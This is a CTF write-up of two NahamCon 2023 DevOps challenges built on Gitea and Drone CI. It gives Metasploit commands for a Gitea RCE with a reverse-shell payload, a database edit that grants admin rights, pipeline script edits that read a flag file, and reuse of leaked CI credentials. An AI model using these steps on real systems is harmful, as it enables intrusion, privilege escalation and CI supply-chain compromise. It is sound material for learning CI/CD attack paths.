NahamCon CTF 2023 Devops Challenge Writeup

Lu William Hanugra
Jun 18, 2023

DevOps Challenge Writeup: the Pirates and Supplier challenges.

NahamCon is a free virtual offensive security conference hosted on Twitch, and the organizers also run a CTF, NahamCon CTF 2023.

NahamCon CTF always delivers good challenges for CTF enthusiasts like me. This year I didn't participate much in categories other than DevOps. There were only two DevOps challenges this year, and I hope to see more next year.
This year my team and I at Vantage Point Security Indonesia finished 10th on the scoreboard.

MAGER means ‘too lazy to move’

I wrote this writeup after seeing other writeups on the Discord. After reading some of them, I can say my approaches are a little bit different. Both challenges use Gitea as the base of the application.

Gitea

Pirates (medium)

You are given some URLs, a username, and a password for the Gitea application. After logging in, you will find a repository named Tortuga.

My attention goes straight to the drone.yml file.

---
kind: pipeline
type: exec
name: to pirate

platform:
  os: linux
  arch: amd64

steps:
- name: to pirate
  commands:
  - ./piratize.sh
trigger:
  event:
  - push
  branch:
  - main
---
kind: signature
hmac: 213aae557e24814352839440ca22083810dfd95237da16e573115ca050823ac6

...

In summary, the steps are executed whenever there is a push into the main branch.

I edited piratize.sh to:

#! /bin/sh

cat /flag.txt
pirate README_ENG.md > README.md

git add README.md
git commit -m "Automatic translation [CI SKIP]"
git push --set-upstream origin main

Then I created a new branch and opened a pull request, but an error stopped me:

This Pull Request doesn’t have enough approvals yet. 0 of 1 approvals granted.

The pipeline will not run until there is a merge into the main branch, so in order to merge the code we need at least one approval.
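The drone.yml above ends with a kind: signature document. As an added example that is not part of the original writeup, the following simplified model (stdlib only, constructed secret, document handling simpler than Drone's real canonicalization) shows what such an HMAC-SHA256 signature does and does not protect: it covers the pipeline definition, but not the content of piratize.sh that the pipeline executes.

```python
import hashlib
import hmac

# Constructed demo secret: the real Tortuga repository secret is unknown,
# so the hmac shown in the writeup cannot be reproduced here.
SECRET = b"constructed-demo-secret"

# The pipeline document from the writeup's drone.yml (signature omitted).
PIPELINE = """\
kind: pipeline
type: exec
name: to pirate
steps:
- name: to pirate
  commands:
  - ./piratize.sh
trigger:
  event:
  - push
  branch:
  - main
"""


def split_documents(yaml_text):
    """Split multi-document YAML on '---' / '...' marker lines, dropping blanks."""
    docs, cur = [], []
    for line in yaml_text.splitlines() + ["---"]:
        if line.strip() in ("---", "..."):
            if "".join(cur).strip():
                docs.append("\n".join(cur))
            cur = []
        else:
            cur.append(line)
    return docs


def is_signature(doc):
    return any(line.strip() == "kind: signature" for line in doc.splitlines())


def sign(yaml_text, secret):
    """HMAC-SHA256 over every non-signature document, hex encoded."""
    body = "\n".join(d for d in split_documents(yaml_text) if not is_signature(d))
    return hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()


def verify(yaml_text, secret):
    """True only if exactly one signature document is present and it matches."""
    sigs = [d for d in split_documents(yaml_text) if is_signature(d)]
    if len(sigs) != 1:
        return False
    stored = next((line.split(":", 1)[1].strip() for line in sigs[0].splitlines()
                   if line.strip().startswith("hmac:")), "")
    return hmac.compare_digest(stored, sign(yaml_text, secret))


def signed_drone_yml(pipeline, secret):
    """Append a signature document to a pipeline (model of a signing step)."""
    return f"---\n{pipeline}---\nkind: signature\nhmac: {sign(pipeline, secret)}\n\n...\n"
```

Changing ./piratize.sh to another command in the YAML invalidates the signature, while changing the script file itself leaves the signature valid; branch protection and review of the scripts the pipeline runs are what close that gap.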

Exploit Phase

What I did was exploit the Gitea instance with CVE-2022-30781.

Gitea Version 1.16.0 on the footer of the Gitea instance

There are two ways to exploit this CVE, the hard way and the simple way. The hard way is to recreate the HTTP service manually and configure the endpoint to pretend to be a Gitea instance.

For example:

Request -> /api/v1/version

Response -> {"version": "1.16.0"}

reference:

The easier way is to use Metasploit installed on a server; for this you definitely need a VPS.

msf6 > use exploit/multi/http/gitea_git_fetch_rce
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RPORT 30299
RPORT => 30299
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RHOSTS challenge.nahamcon.com
RHOSTS => challenge.nahamcon.com
msf6 exploit(multi/http/gitea_git_fetch_rce) > set USERNAME jack
USERNAME => jack
msf6 exploit(multi/http/gitea_git_fetch_rce) > set PASSWORD Bu7!^zTZ
PASSWORD => Bu7!^zTZ
msf6 exploit(multi/http/gitea_git_fetch_rce) > set PAYLOAD linux/x64/shell/reverse_tcp
PAYLOAD => linux/x64/shell/reverse_tcp
reverse shell success

I found the Gitea database and configuration under /data/gitea.

gitea data and config
SQLite3

gitea.db is an SQLite3 database file,

so I extracted the db file and inspected it using https://sqliteonline.com/

sqlite viewer online

Update user jack to the admin role:

sqlite3 gitea.db
UPDATE user SET is_admin='1' WHERE id=4;
.exit

Refresh the page:

jack is now an Admin

As an Admin, jack can merge the pull request.

Go to http://drone.challenge.nahamcon.com:30299/

Solved

Post Exploitation Phase

Get a reverse shell on the runner server.

input reverse shell payload

I did some recon and found this credential; later on it can be reused in the Supplier challenge.

droneci:t4K0@s!qSF

Supplier (hard)

You are given some URLs, a username, and a password for the Gitea application. After logging in, you will find a repository named infra.

infra repository

My attention goes straight to the drone.yml file, so I can learn how this pipeline works.

kind: pipeline
type: exec
name: default

platform:
  os: linux
  arch: amd64

trigger:
  event:
  - cron

steps:
- name: tf_plan
  commands:
  - make plan

So there is already a cron job that triggers the steps. What we want to exploit is to change the content of the Makefile, so that when the event fires the payload is executed through the make plan command.

Exploit phase

I tried to edit the Makefile directly, but I couldn't: the repository settings require us to fork it and presumably open a pull request.

I tried to fork, but got this error:

The owner has already reached the limit of 0 repositories.

In order to solve this issue, I tried a different approach. I thought maybe the creator of this challenge didn't change the droneci credential across the DevOps challenges. And my thought worked out perfectly!

This is what I found earlier in the Pirates challenge:

droneci:t4K0@s!qSF
droneci login

So the droneci user can commit directly into the repository; just add cat /flag.txt to the Makefile.

Solved

That's it. I hope you learned something from this simple writeup. Thank you for reading!
